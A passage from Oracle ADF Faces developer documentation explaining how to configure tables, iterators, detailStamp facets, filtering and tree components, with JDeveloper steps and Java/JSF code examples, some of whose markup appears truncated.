desirable if you expect the table to display large amounts of data. Column stretching: If the widths of the columns do not together fill the whole table, you can set the columnStretching attribute to determine whether or not to stretch columns to fill up the space, and if so, which columns should stretch. You can set the minimum width for columns, so that when there are many columns in a table and you enable stretching, columns will not be made smaller than the set minimum width. You can also set a width percentage for each column you want to stretch to determine the amount of space that column should take up when stretched. Note:If the total sum of the columns' minimum widths equals more than the viewable space in the viewport, the table will expand outside the viewport and a scrollbar will appear to allow access outside the viewport. Performance Tip:Column stretching is turned off by default. Turning on this feature may have a performance impact on the client rendering time when used for complex tables (that is, tables with a large amount of data, or with nested columns, and so on). Note:Columns configured to be row headers or configured to be frozen will not be stretched because doing so could easily leave the user unable to access the scrollable body of the table. Column selection: You can choose to allow users to be able to select columns of data. As with row selection, you can configure the table to allow single or multiple column selection. You can also use the columnSelectionListener to respond to the ColumnSelectionEvent that is invoked when a new column is selected by the user. This event reports which columns were just deselected and which columns were just selected. Column reordering: Users can reorder the columns at runtime by simply dragging and dropping the column headers. By default, column reordering is allowed, and is handled by a menu item in the panelCollection component. For more information, see Section 10.8, "Displaying Table Menus, Toolbars, and Status Bars." Each column component also offers many formatting and visual aids to the user. You can enable these features and specify how they can be displayed. These features include: Column sorting: Columns can be configured so that the user can sort the contents by a given column, either in ascending or descending order using the sortable attribute. A special indicator on a column header lets the user know that the column can be sorted. When the user clicks on the icon to sort a previously unsorted column, the column's content is sorted in ascending order. Subsequent clicks on the same header sort the content in the reverse order. In order for the table to be able to sort, the underlying data model must also support sorting. For more information, see Section 10.2.7, "What You May Need to Know About Programmatically Enabling Sorting for Table Columns." Content alignment: You can align the content within the column to either the start, end, left, right, or center using the align attribute. Tip:Use startand endinstead of leftand rightif your application supports multiple reading directions. Column width: The width of a column can be specified as an absolute value in pixels using the width attribute. If you configure a column to allow stretching, then you can also set the width as a percentage. Line wrapping: You can define whether or not the content in a column can wrap over lines, using the noWrap attribute. By default, content will not wrap. Row headers: You can define the left-most column to be a row header using the rowHeader attribute. When you do so, the left-most column is rendered with the same look as the column headers, and will not scroll off the page. Figure 10-12 shows how a table showing departments appears if the first column is configured to be a row header. If you elect to use a row header column and you configure your table to allow row selection, the row header column displays a selection arrow when a users hovers over the row, as shown in Figure 10-13. For tables that allow multiple selection, users can mouse down and then drag on the row header to select a contiguous blocks of rows. The table will also autoscroll vertically as the user drags up or down. Tip:While the user can change the way the table displays at runtime (for example the user can reorder columns or change column widths), those values will not be retained once the user leaves the page unless you configure your application to allow user customization. For information, see Chapter 31, "Allowing User Customization on JSF Pages." You use the Create an ADF Faces Table dialog to add a table to a JSF page. You also use this dialog to add column components for each column you need for the table. You can also bind the table to the underlying model or bean using EL expressions. Note:If your application uses the Fusion technology stack, then you can use data controls to create tables and the binding will be done for you. For more information see the "Creating ADF Databound Tables" chapter of the Oracle Fusion Middleware Web User Interface Developer's Guide for Oracle Application Development Framework. Once you complete the dialog, and the table and columns are added to the page, you can use the Property Inspector to configure additional attributes of the table or columns, and add listeners to respond to table events. You must have an implementation of the CollectionModel class to which your table will be bound. To display a table on a page: In the Component Palette, from the Common Components panel, drag and drop a Table to open the Create ADF Faces Table dialog. Use the dialog to bind the table to any existing model you have. When you bind the table to a valid model, the dialog automatically shows the columns that will be created. You can then use the dialog to edit the values for the columns' header and value attributes, and choose the type of component that will be used to display the data. Alternatively, you can manually configure columns and bind at a later date. For more information about using the dialog, press F1 or click Help. In the Property Inspector, expand the Common section. If you have already bound your table to a model, the value attribute should be set. You can use this section to set the following table-specific attributes: RowSelection: Set a value to make the rows selectable. Valid values are: none, single, and multiple, and multipleNoSelectAll. Note:Users can select all rows and all columns in a table by clicking the column header for the row header if the rowSelectionattribute is set to multipleand that table also contains a row header. If you do not want users to be able to select all columns and rows, then set rowSelectionto multipleNoSelectAll. For information about how to then programatically perform some action on the selected rows, see Section 10.2.8, "What You May Need to Know About Performing an Action on Selected Rows in Tables." ColumnSelection: Set a value to make the columns selectable. Valid values are: none, single, and multiple. Expand the Columns section. If you previously bound your table using the Create ADF Faces Table dialog, then these settings should be complete. You can use this section to change the binding for the table, to change the variable name used to access data for each row, and to change the display label and components used for each column. Tip:If you want to use a component other than those listed, select any component in the Property Inspector, and then manually change it: In the Structure window, right-click the component created by the dialog. Choose Convert from the context menu. Select the desired component from the list. You can then use the Property Inspector to configure the new component. Tip:If you want more than one component to be displayed in a column, add the other component manually and then wrap them both in a panelGroupLayoutcomponent. To do so: In the Structure window, right-click the first component and choose Insert before or Insert after. Select the component to insert. By default the components will be displayed vertically. To have multiple components displayed next to each other in one column, press the shift key and select both components in the Structure window. Right-click the selection and choose Surround With. panelGroupLayout. Expand the Appearance section. You use this section to set the appearance of the table, by setting the following table-specific attributes: Width: Specify the width of the table. You can specify the width as either a percentage or as a number of pixels. The default setting is 300 pixels. If you configure the table to stretch columns (using the columnStretching attribute), you must set the width to percentages. Tip:If the table is a child to a component that stretches its children, then this width setting will be overridden and the table will automatically stretch to fit its container. For more information about how components stretch, see Section 8.2.1, "Geometry Management and Component Stretching." ColumnStretching: If the widths of the columns do not together fill the whole table, you can set this attribute to determine whether or not to stretch columns to fill up the space, and if so, which columns should stretch. Note:If the table is placed inside a component that can stretch its children, only the table will stretch automatically. You must manually configure column stretching if you want the columns to stretch to fill the table. Note:Columns configured to be row headers or configured to be frozen will not be stretched because doing so could easily leave the user unable to access the scrollable body of the table. Performance Tip:Column stretching is turned off by default. Turning on this feature may have a performance impact on the client rendering time for complex tables. You can set column stretching to one of the following values: blank: If you want to have an empty blank column automatically inserted and have it stretch (so the row background colors will span the entire width of the table). A specifically named column: Any column currently in the table can be selected to be the column to stretch. last: If you want the last column to stretch to fill up any unused space inside of the window. none: The default option where nothing will be stretched. Use this for optimal performance. multiple: All columns that have a percentage value set for their width attribute will be stretched to that percent, once other columns have been rendered to their (non-stretched) width. The percentage values will be weighted with the total. For example, if you set the width attribute on three columns to 50%, each column will get 1/3 of the remaining space after all other columns have been rendered. Tip:While the user can change the values of the column width at runtime, those values will not be retained once the user leaves the page unless you configure your application to use change persistence. For information about enabling and using change persistence, see Chapter 31, "Allowing User Customization on JSF Pages." HorizontalGridVisible: Specify whether or not the horizontal grid lines are to be drawn. VerticalGridVisible: Specify whether or not the vertical grid lines are to be drawn. RowBandingInterval: Specify how many consecutive rows form a row group for the purposes of color banding. By default, this is set to 0, which displays all rows with the same background color. Set this to 1 if you want to alternate colors. ColumnBandingInterval: Specify the interval between which the column banding occurs. This value controls the display of the column banding in the table. For example, columnBandingInterval=1 would display alternately banded columns in the table. FilterVisible: You can add a filter to the table so that it displays only those rows that match the entered filter criteria. If you configure the table to allow filtering, you can set the filter to be case-insensitive or case-sensitive. For more information, see Section 10.4, "Enabling Filtering in Tables." Text attributes: You can define text strings that will determine the text displayed when no rows can be displayed, as well as a table summary and description for accessibility purposes. Expand the Behavior section. You use this section to configure the behavior of the table by setting the following table-specific attributes: DisableColumnReordering: By default, columns can be reordered at runtime using a menu option contained by default in the panelCollection component. You can change this so that users will not be able to change the order of columns. (The panelCollection component provides default menus and toolbar buttons for tables, trees, and tree tables. For more information, see Section 10.8, "Displaying Table Menus, Toolbars, and Status Bars".) Note:While the user can change the order of columns, those values will not be retained once the user leaves the page unless you configure your application to allow user customization. For information, see Chapter 31, "Allowing User Customization on JSF Pages." FetchSize: Set the size of the block that should be returned with each data fetch. The default is 25. Tip:You should determine the value of the fetchSizeattribute by taking the height of the table and dividing it by the height of each row to determine how many rows will be needed to fill the table. If the fetchSizeattribute is set too low, it will require multiple trips to the server to fill the table. If it is set too high, the server will need to fetch more rows from the data source than needed, thereby increasing time and memory usage. On the client side, it will take longer to process those rows and attach them to the component. For more information, see Section 10.1.1, "Content Delivery."." AutoHeightRows: If you want your table to size the height automatically to fill up available space, specify the maximum number of rows that the table should display. The default value is -1 (no automatic sizing for any number of rows). You can also set the value to 0 to have the value be the same as the fetchSize. 8.2.1, "Geometry Management and Component Stretching." DisplayRow: Specify the row to be displayed in the table during the initial display. The possible values are first to display the first row at the top of the table, last to display the last row at the bottom of the table (users will need to scroll up to view preceding rows) and selected to display the first selected row in the table. Note:The total number of rows from the table model must be known in order for this attribute to work successfully. DisplayRowKey: Specify the row key to display in the table during initial display. This attribute should be set programmatically rather than declaratively because the value may not be strings. Specifying this attribute will override the displayRow attribute. Note:The total number of rows must be known from the table model in order for this attribute to work successfully. EditingMode: Specify whether for any editable components, you want all the rows to be editable ( editAll), or you want the user to click a row to make it editable ( clickToEdit). For more information, see Section 10.1.3, "Editing Data in Tables, Trees, and Tree Tables." Tip:If you choose clickToEdit, then only the active row can be edited. This row is determined by the activeRowKeyattribute. By default, when the table is first rendered, the active row is the first visible row. When a user clicks another row, then that row becomes the active row. You can change this behavior by setting a different value for the activeRowKeyattribute, located in the Other section. ContextMenuSelect: Specify whether or not the row is selected when you right-click to open a context menu. When set to true, the row is selected. For more information about context menus, see Chapter 13, "Using Popup Dialogs, Menus, and Windows." FilterModel: Use in conjunction with filterVisible. For more information, see Section 10.4, "Enabling Filtering in Tables." Various listeners: Bind listeners to methods that will execute when the table invokes the corresponding event (the columnSelectionListener is located in the Other section). For more information, see Chapter 5, "Handling Events." Expand the Other section, and set the following: ActiveRowKey: If you choose clickToEdit, then only the active row can be edited. This row is determined by the activeRowKey attribute. By default, when the table is first rendered, the active row is the first visible row. When a user clicks another row, then that row becomes the active row. You can change this behavior by setting a different value for the activeRowKey attribute. ColumnResizing: Specify whether or not you want the end user to be able to resize a column's width at runtime. When set to disabled, the widths of the columns will be set once the page is rendered, and the user will not be able to change those widths. Tip:While the user can change the values of the column width at runtime, those width values will not be retained once the user leaves the page unless you configure your application to use change persistence. For information about enabling and using change persistence, see Chapter 31, "Allowing User Customization on JSF Pages." In the Structure window, select a column. In the Property Inspector, expand the Common section, and set the following column-specific attributes: HeaderText: Specify text to be displayed in the header of the column. This is a convenience that generates output equivalent to adding a header facet containing an outputText component. If you want to use a component other than outputText, you should use the column's header facet instead (for more information, see Step 12). When the header facet is added, any value for the headerText attribute will not be rendered in a column header. Align: Specify the alignment for this column. start, end, and center are used for left-justified, right-justified, and center-justified respectively in left-to-right display. The values left or right can be used when left-justified or right-justified cells are needed, irrespective of the left-to-right or right-to-left display. The default value is null, which implies that it is skin-dependent and may vary for the row header column versus the data in the column. For more information about skins, see Chapter 20, "Customizing the Appearance Using Styles and Skins." Sortable: Specify whether or not the column can be sorted. A column that can be sorted has a header that when clicked, sorts the table by that column's property. Note that in order for a column to be sortable, the sortable attribute must be set to true and the underlying model must support sorting by this column's property. For more information, see Section 10.2.7, "What You May Need to Know About Programmatically Enabling Sorting for Table Columns." Note:When column selection is enabled, clicking on a column header selects the column instead of sorting the column. In this case, columns can be sorted by clicking the ascending/descending sort indicator. Filterable: Specify whether or not the column can be filtered. A column that can be filtered has a filter field on the top of the column header. Note that in order for a column to be filterable, this attribute must be set to true and the filterModel attribute must be set on the table. Only leaf columns can be filtered and the filter component is displayed only if the column header is present. This column's sortProperty attribute must be used as a key for the filterProperty attribute in the filterModel class. Note:For a column with filtering turned on ( filterable= true), you can specify the input component to be used as the filter criteria input field. To do so, add a filter facet to the column and add the input component. For more information, see Section 10.4, "Enabling Filtering in Tables." Expand the Appearance section. Use this section to set the appearance of the column, using the following column-specific attributes: DisplayIndex: Specify the display order index of the column. Columns can be rearranged and they are displayed in the table based on the displayIndex attribute. Columns without a displayIndex attribute value are displayed at the end, in the order in which they appear in the data source. The displayIndex attribute is honored only for top-level columns, because it is not possible to rearrange a child column outside of the parent column. Width: Specify the width of the column. MinimumWidth: Specify the minimum number of pixels for the column width. When a user attempts to resize the column, this minimum width will be enforced. Also, when a column is flexible, it will never be stretched to be a size smaller than this minimum width. If a pixel width is defined and if the minimum width is larger, the minimum width will become the smaller of the two values. By default, the minimum width is 10 pixels. ShowRequired: Specify whether or not an asterisk should be displayed in the column header if data is required for the corresponding attribute. HeaderNoWrap and NoWrap: Specify whether or not you want content to wrap in the header and in the column. RowHeader: Set to true if you want this column to be a row header for the table. Expand the Behavior section. Use this section to configure the behavior of the columns, using the following column-specific attributes: SortProperty: Specify the property that is to be displayed by this column. This is the property that the framework might use to sort the column's data. Frozen: Specify whether the column is frozen; that is they can't be scrolled off the page. In the table, columns up to the frozen column are locked with the header, and not scrolled with the rest of the columns. The frozen attribute is honored only on the top-level column, because it is not possible to freeze a child column by itself without its parent being frozen. Selected: When set to true, the column will be selected on initial rendering. To add a column to an existing table, in the Structure window, right-click the table and from the context menu choose Insert Inside Table > Column. To add facets to the table, right-click the table and from the context menu, choose Facets - Table. To add facets to a column, right-click the column and from the context menu, choose Facets - Column. Add components as children to the columns to display your data. The component's value should be bound to the variable value set on the table's var attribute and the attribute to be displayed. For example, the table in the File Explorer application uses file as the value for the var attribute, and the first column displays the name of the file for each row. Therefore, the value of the output component used to display the directory name is #{file.name}. Tip:If an input component is the direct child of a column, be sure its width is set to a width that is appropriate for the width of the column. If the width is set too large for its parent column, the browser may extend its text input cursor too wide and cover adjacent columns. For example, if an inputTextcomponent has its size set to 80 pixels and its parent column size is set to 20 pixels, the table may have an input cursor that covers the clickable areas of it neighbor columns. To allow the input component to be automatically sized when it is not the direct child of a column, set contentStyle="width:auto". When you use JDeveloper to add a table onto a page, JDeveloper creates a table with a column for each attribute. If you bind the table to a model, the columns will reflect the attributes in the model. If you are not yet binding to model, JDeveloper will create the columns using the default values. You can change the default values (add/delete columns, change column headings, and so on) during in the table creation dialog or later using the Property Inspector. Example 10-2 shows abbreviated page code for the table in the File Explorer application. Example 10-2 ADF Faces Table in the File Explorer Application <af:table <af:column <f:facet <af:outputText </f:facet> <af:panelGroupLayout> <af:image <af:outputText </af:panelGroupLayout> </af:column> <af:column <f:facet <af:outputText </f:facet> <af:outputText </af:column> ... <af:column <f:facet <af:outputText </f:facet> <af:commandLink</af:commandLink> </af:column> </af:table> When a page is requested that contains a table, and the content delivery is set to lazy, the page initially goes through the standard lifecycle. However, instead of fetching the data during that request, a special separate PPR request is run. Because the page has just rendered, only the Render Response phase executes, and the corresponding data is fetched and displayed. If the user's actions cause a subsequent data fetch (for example scrolling in a table), another PPR request is executed. Figure 10-14 shows a page containing a table during the second PPR request. When the user clicks a sortable column header, the table component generates a SortEvent event. This event has a getSortCriteria property, which returns the criteria by which the table must be sorted. The table responds to this event by calling the setSortCriteria() method on the underlying CollectionModel instance, and calls any registered SortListener instances. Sorting can be enabled for a table column only if the underlying model supports sorting. If the model is a CollectionModel instance, it must implement the following methods: public boolean isSortable(String propertyName ) public List getSortCriteria() public void setSortCriteria(List criteria ) For more information, see the MyFaces Trinidad Javadoc at. If the underlying model is not a CollectionModel instance, the table component automatically examines the actual data to determine which properties can be sorted. Any column that has data that implements the java.lang.Comparable class is able to be sorted. Although this automatic support is not as efficient as coding sorting directly into a CollectionModel (for instance, by translating the sort into an ORDER BY SQL clause), it may be sufficient for small data sets. Note:Automatic support provides sorting for only one column. Multi-column sorting is not supported. A table can allow users to select one or more rows and perform some actions on those rows. When the selection state of a table changes, the table triggers selection events. A selectionEvent event reports which rows were just deselected and which rows were just selected. To listen for selection events on a table, you can register a listener on the table either using the selectionListener attribute or by adding a listener to the table using the addselectionListener() method. The listener can then access the selected rows and perform some actions on them. The current selection, that is the selected row or rows, are the RowKeySet object, which you obtain by calling the getSelectedRowKeys() method for the table. To change a selection programmatically, you can do either of the following: Add rowKey objects to, or remove rowKey objects from, the RowKeySet object. Make a particular row current by calling the setRowIndex() or the setRowKey() method on the table. You can then either add that row to the selection, or remove it from the selection, by calling the add() or remove() method on the RowKeySet object. Example 10-3 shows a portion of a table in which a user can select some rows then click the Delete button to delete those rows. Note that the actions listener is bound to the performDelete method on the mybean managed bean. Example 10-3 Selecting Rows <af:table Example 10-4 shows an actions method, performDelete, which iterates through all the selected rows and calls the markForDeletion method on each one. Example 10-4 Using the rowKey Object public void performDelete(ActionEvent action) { UIXTable table = getTable(); Iterator selection = table.getSelectedRowKeys().iterator(); Object oldKey = table.getRowKey(); while(selection.hasNext()) { Object rowKey = selection.next(); table.setRowKey(rowKey); MyRowImpl row = (MyRowImpl) table.getRowData(); //custom method exposed on an implementation of Row interface. row.markForDeletion(); } // restore the old key: table.setRowKey(oldKey); } // Binding methods for access to the table. public void setTable(UIXTable table) { _table = table; } public UIXTable getTable() { return _table; } private UIXTable _table; There may be a case when you want to use a selectOne component in a table, but you need each row to display different choices in a component. Therefore, you need to dynamically determine the list of items at runtime. While you may think you should use a forEach component to stamp out the individual items, this will not work because forEach does not work with the CollectionModel instance. It also cannot be bound to EL expressions that use component-managed EL variables, as those used in the table. The forEach component performs its functions in the JSF tag execution step while the table performs in the following component encoding step. Therefore, the forEach component will execute before the table is ready and will not perform its iteration function. In the case of a selectOne component, the direct child must be the items component. While you could bind the items component directly to the row variable (for example, <f:items, doing so would not allow any changes to the underlying model. Instead, you should create a managed bean that creates a list of items, as shown in Example 10-5. Example 10-5 Managed Bean Returns a List of Items public List<SelectItem> getItems() { // Grab the list of items FacesContext context = FacesContext.getCurrentInstance(); Object rowItemObj = context.getApplication().evaluateExpressionGet( context, "#{row.items}", Object.class); if (rowItemObj == null) return null; // Convert the model objects into items List<SomeModelObject> list = (List<SomeModelObject>) rowItemObj; List<SelectItem> items = new ArrayList<SelectItem>(list.size()); for (SomeModelObject entry : list) { items.add(new SelectItem(entry.getValue(), entry.getLabel());public } // Return the items return items; } You can then access the list from the one component on the page, as shown in Example 10-6. When you do not want to use a table, but still need the same stamping capabilities, you can use the iterator tag. For example, say you want to display a list of periodic table elements, and for each element, you want to display the name, atomic number, symbol, and group. You can use the iterator tag as shown in Example 10-7. Example 10-7 Using the Iterator Tag <af:iterator <af:outputText <af:inputText <af:inputText <af:inputText <af:inputText </af:iterator> Each child is stamped as many times as necessary. Iteration starts at the index specified by the first attribute for as many indexes specified by the row attribute. If the row attribute is set to 0, then the iteration continues until there are no more elements in the underlying data. You can use the detailStamp facet in a table to include data that can be displayed or hidden. When you add a component to this facet, the table displays an additional column with a toggle icon. When the user clicks the icon, the component added to the facet is shown. When the user clicks on the toggle icon again, the component is hidden. Figure 10-15 shows the additional column that is displayed when content is added to the detailStamp facet. Note:When a table that uses the detailStampfacet is rendered in Screen Reader mode, the contents of the facet appear in a popup window. For more information about accessibility, see Chapter 22, "Developing Accessible ADF Faces Pages." Figure 10-16 shows the same table, but with the detailStamp facet expanded for the first row. Note:If you set the table to allow columns to freeze, the freeze will not work when you display the detailStampfacet. That is, a user cannot freeze a column while the details are being displayed. To use the detailStamp facet, you insert a component that is bound to the data to be displayed or hidden into the facet. To use the detailStamp facet: In the Component Palette, drag the components you want to appear in the facet to the detailStamp facet folder. Figure 10-17 shows the detailStamp facet folder in the Structure window. Tip:If the facet folder does not appear in the Structure window, right-click the table and choose Facets - Table > Detail Stamp. If the attribute to be displayed is specific to a current record, replace the JSF code (which simply binds the component to the attribute), so that it uses the table's variable to display the data for the current record. Example 10-8 shows abbreviated code used to display the detailStamp facet shown in Figure 10-16, which shows details about the selected row. Example 10-8 Code for detailStamp Facet <af:table <af:panelFormLayout <af:inputText <af:group> <af:inputText <af:inputText <af:inputText </af:group> </af:panelFormLayout> </f:facet> </af:table> Note:If your application uses the Fusion technology stack, then you can drag attributes from a data control and drop them into the detailStampfacet. You don't need to modify the code. When the user hides or shows the details of a row, the table generates a rowDisclosureEvent event. The event tells the table to toggle the details (that is, either expand or collapse). The rowDisclosureEvent event has an associated listener. You can bind the rowDisclosureListener attribute on the table to a method on a managed bean. This method will then be invoked in response to the rowDisclosureEvent event to execute any needed post-processing. You can add a filter to a table that can be used so that the table displays only rows whose values match the filter. When enabled and set to visible, a search criteria input field displays above each searchable column. For example, the table in Figure 10-18 has been filtered to display only rows in which the Location value is 1700. Filtered table searches are based on Query-by-Example and use the QBE text or date input field formats. The input validators are turned off to allow for entering characters for operators such as > and < to modify the search criteria. For example, you can enter >1500 as the search criteria for a number column. Wildcard characters may also be supported. Searches can be either case-sensitive or case-insensitive. If a column does not support QBE, the search criteria input field will not render for that column. The filtering feature uses a model for filtering data into the table. The table's filterModel attribute object must be bound to an instance of the FilterableQueryDescriptor class. Note:If your application uses the Fusion technology stack, then you can use data controls to create tables and filtering will be created for you. For more information see the "Creating ADF Databound Tables" chapter of the Oracle Fusion Middleware Web User Interface Developer's Guide for Oracle Application Development Framework In Example 10-9, the table filterVisible attribute is set to true to enable the filter input fields, and the sortProperty attribute is set on the column to identify the column in the filterModel instance. Each column element has its filterable attribute set to true. Example 10-9 Table Component with Filtering Enabled <af:table ... <af:column ... </af:column> <af:column ... </af:column> <af:column ... </af:column> </af:table> To add filtering to a table, first create a class that can provide the filtering functionality. You then bind the table to that class, and configure the table and columns to use filtering. The table that will use filtering must either have a value for its headerText attribute, or it must contain a component in the header facet of the column that is to be filtered. This allows the filter component to be displayed. Additionally, the column must be configured to be sortable, because the filterModel class uses the sortProperty attribute. To add filtering to a table: Create a Java class that is a subclass of the FilterableQueryDescriptor class. For more information about this class, see the ADF Faces Javadoc. Create a table, as described in Section 10.2, "Displaying Data in Tables." Select the table in the Structure window and set the following attributes in the Property Inspector: FilterVisible: Set to true to display the filter criteria input field above searchable column. FilterModel: Bind to an instance of the FilterableQueryDescriptor class created in Step 1. Tip:If you want to use a component other than an inputTextcomponent for your filter (for example, an inputDatecomponent), then instead of setting filterVisibleto true, you can add the needed component to the filterfacet. To do so: In the Structure window, right-click the column to be filtered and choose Insert inside af:column > JSF Core > Filter facet. From the Component Palette, drag and drop a component into the facet. Set the value of the component to the corresponding attribute within the FilterableQueryDescriptor class created in Step 1. Note that the value must take into account the variable used for the row, for example: #{af:inputDate label="Select Date" id="name" value="row.filterCriteria.date"} In the Structure window, select a column in the table and in the Property Inspector, and set the following for each column in the table: Filterable: Set to true. FilterFeatures: Set to caseSensitive or caseInsensitive. If not specified, the case sensitivity is determined by the model. The ADF Faces tree component displays hierarchical data, such as organization charts or hierarchical directory structures. In data of these types, there may be a series of top-level nodes, and each element in the structure may expand to contain other elements. As an example, in an organization chart, each element, that is, each employee, in the hierarchy may have any number of child elements (direct reports). The tree component supports multiple root elements. It displays the data in a form that represents the structure, with each element indented to the appropriate level to indicate its level in the hierarchy, and connected to its parent. Users can expand and collapse portions of the hierarchy. Figure 10-19 shows a tree used to display directories in the File Explorer application. The ADF Faces tree component uses a model to access the data in the underlying hierarchy. The specific model class is oracle.adf.view.rich.model.TreeModel, which extends CollectionModel, described in Section 10.2, "Displaying Data in Tables." You must create your own tree model to support your tree.. You may find the oracle.adf.view.rich.model.ChildPropertyTreeModel class useful when constructing a TreeModel class, as shown in Example 10-10. Example 10-10 Constructing a TreeModel List<TreeNode> root = new ArrayList<TreeNode>(); for(int i = 0; i < firstLevelSize; i++) { List<TreeNode> level1 = new ArrayList<TreeNode>(); for(int j = 0; j < i; j++) { List<TreeNode> level2 = new ArrayList<TreeNode>(); for(int k=0; k<j; k++) { TreeNode z = new TreeNode(null, _nodeVal(i,j,k)); level2.add(z); } TreeNode c = new TreeNode(level2, _nodeVal(i,j)); level1.add(c); } TreeNode n = new TreeNode(level1, _nodeVal(i)); root.add(n); } ChildPropertyTreeModel model = new ChildPropertyTreeModel(root, "children"); private String _nodeVal(Integer... args) { StringBuilder s = new StringBuilder(); for(Integer i : args) s.append(i); return s.toString(); } Note:If your application uses the Fusion technology stack, then you can use data controls to create trees and the model will be created for you. For more information see the "Displaying Master-Detail Data" chapter of the Oracle Fusion Middleware Web User Interface Developer's Guide for Oracle Application Development Framework You can manipulate the tree similar to the way you can manipulate a table. You can do the following: To make a node current, call the setRowIndex() method on the tree with the appropriate index into the list. Alternatively, call the setRowKey() method with the appropriate rowKey object. To access a particular node, first make that node current, and then call the getRowData() method on the tree. To access rows for expanded or collapsed nodes, call getAddedSet and getRemovedSet methods on the RowDisclosureEvent. For more information, see Section 10.5.4, "What You May Need to Know About Programmatically Expanding and Collapsing Nodes." To manipulate the node's child collection, call the enterContainer() method before calling the setRowIndex() and setRowKey() methods. Then call the exitContainer() method to return to the parent node. To point to a rowKey for a node inside the tree (at any level) use the focusRowKey attribute. The focusRowKey attribute is set when the user right-clicks on a node and selects the Show as top context menu item (or the Show as top toolbar button in the panelCollection component). When the focusRowKey attribute is set, the tree renders the node pointed to by the focusRowKey attribute as the root node in the Tree and displays a Hierarchical Selector icon next to the root node. Clicking the Hierarchical Selector icon displays a Hierarchical Selector dialog which shows the path to the focusRowKey object from the root node of the tree. How this displays depends on the components placed in the pathStamp facet. As with tables, trees use stamping to display content for the individual nodes. Trees contain a nodeStamp facet, which is a holder for the component used to display the data for each node. Each node is rendered (stamped) once, repeatedly for all nodes. As each node is stamped, the data for the current node is copied into a property that can be addressed using an EL expression. Specify the name to use for this property using the var property on the tree. Once the tree has completed rendering, this property is removed or reverted back to its previous value. Because of this stamping behavior, only certain types of components are supported as children inside an ADF Faces tree. All components that have no behavior are supported, as are most components that implement the ValueHolder or ActionSource interfaces. In Example 10-11, the data for each element is referenced using the variable node, which identifies the data to be displayed in the tree. The nodeStamp facet displays the data for each element by getting further properties from the node variable: Example 10-11 Displaying Data in a Tree <af:tree <f:facet <af:outputText </f:facet> </af:tree> Trees also contain a pathStamp facet. This facet determines how the content of the Hierarchical Selector dialog is rendered, just like the nodeStamp facet determines how the content of the tree is rendered. The component inside the pathStamp facet can be a combination of simple outputText, image, and outputFormatted tags and cannot not be any input component (that is, any EditableValueHolder component) because no user input is allowed in the Hierarchical Selector popup. If this facet is not provided, then the Hierarchical Selector icon is not rendered. For example, including an image and an outputText component in the pathStamp facet causes the tree to render an image and an outputText component for each node level in the Hierarchical Selector dialog. Use the same EL expression to access the value. For example, if you want to show the first name for each node in the path in an outputText component, the EL expression would be <af:outputText. Tip:The pathStampfacet is also used to determine how default toolbar buttons provided by the panelCollectioncomponent will behave. If you want to use the buttons, add a component bound to a node value. For more information about using the panelCollectioncomponent, see Section 10.8, "Displaying Table Menus, Toolbars, and Status Bars." To create a tree, you add a tree component to your page and configure the display and behavior properties. Create a Java class that extends the org.apache.myfaces.trinidad.model.TreeModel class, as shown in Example 10-10. In the Component Palette, from the Common Components panel, drag and drop a Tree to open the Insert Tree dialog. Configure the tree as needed. Click Help or press F1 for help in using the dialog. In the Property Inspector, expand the Data section and set the following attributes: Value: Specify an EL expression for the object to which you want the tree to be bound. This must be an instance of org.apache.myfaces.trinidad.model.TreeModel as created in Step 1. Var: Specify a variable name to represent each node. VarStatus: Optionally enter a variable that can be used to determine the state of the component. During the Render Response phase, the tree iterates over the model rows and renders each node. For any given node, the varStatus attribute provides the following information: model: A reference to the CollectionModel instance index: The current row index rowKey: The unique key for the current node Expand the Appearance section and set the following attributes: DisplayRow: Specify the node to display in the tree during the initial display. The possible values are first to display the first node, last to display the last node, and selected to display the first selected node in the tree. The default is first. DisplayRowKey: Specify the row key to display in the tree during the initial display. This attribute should be set only programatically. Specifying this attribute will override the displayRow attribute. Summary: Optionally enter a summary of the data displayed by the tree. Expand the Behavior section and set the following attributes: InitiallyExpanded: Set to true if you want all nodes expanded when the component first renders. EditingMode: Specify whether for any editable components used to display data in the tree, you want all the nodes to be editable ( editAll), or you want the user to click a node to make it editable ( clickToEdit). For more information, see Section 10.1.3, "Editing Data in Tables, Trees, and Tree Tables." ContextMenuSelect: Determines whether or not the node is selected when you right-click to open a context menu. When set to true, the node is selected. For more information about context menus, see Chapter 13, "Using Popup Dialogs, Menus, and Windows." RowSelection: Set a value to make the nodes selectable. Valid values are: none, single, or multiple. For information about how to then programatically perform some action on the selected nodes, see Section 10.5.5, "What You May Need to Know About Programmatically Selecting Nodes."." FetchSize: Specify the number of rows in the data fetch block. For more information, see Section 10.1.1, "Content Delivery." SelectionListener: Optionally enter an EL expression for a listener that handles selection events. For more information, see Section 10.5.5, "What You May Need to Know About Programmatically Selecting Nodes." FocusListener: Optionally enter an EL expression for a listener that handles focus events. RowDisclosureListener: Optionally enter an EL expression for a listener method that handles node disclosure events. Expand the Advanced section and set the following attributes: FocusRowKey: Optionally enter the node that is to be the initially focused node. DisclosedRowKeys: Optionally enter an EL expression to a method on a backing bean that handles node disclosure. For more information, see Section 10.5.4, "What You May Need to Know About Programmatically Expanding and Collapsing Nodes." SelectedRowKeys: Optionally enter the keys for the nodes that should be initially selected. For more information, see Section 10.5.5, "What You May Need to Know About Programmatically Selecting Nodes." If you want your tree to size its height automatically, expand the Other section and set AutoHeightRows to the maximum number of nodes to display before a scroll bar is displayed. The default value is -1 (no automatic sizing for any number of number). You can set the value to 0 to have the value be the same as the fetchSize value. 10.1.6, "Geometry Management and Table, Tree, and Tree Table Components." To add components to display data in the tree, drag the desired component from the Component Palette to the nodeStamp facet. Figure 10-20 shows the nodeStamp facet for the tree used to display directories in the File Explorer application. The component's value should be bound to the variable value set on the tree's var attribute and the attribute to be displayed. For example, the tree in the File Explorer application uses folder as the value for the var attribute, and displays the name of the directory for each node. Therefore, the value of the output component used to display the directory name is #{folder.name}. Tip:Facets can accept only one child component. Therefore, if you want to use more than one component per node, place the components in a group component that can be the facet's direct child, as shown in Figure 10-20. When you add a tree to a page, JDeveloper adds a nodeStamp facet to stamp out the nodes of the tree. Example 10-12 shows the abbreviated code for the tree in the File Explorer application that displays the directory structure. Example 10-12 ADF Faces Tree Code in a JSF Page <af:tree <f:facet <af:panelGroupLayout> <af:image <af:outputText </af:panelGroupLayout> </f:facet> </af:tree> The tree is displayed in a format with nodes indented to indicate their levels in the hierarchy. The user can click nodes to expand them to show children nodes. The user can click expanded nodes to collapse them. When a user clicks one of these icons, the component generates a RowDisclosureEvent event. You can register a custom rowDisclosureListener method to handle any processing in response to the event. For more information, see Section 10.5.4, "What You May Need to Know About Programmatically Expanding and Collapsing 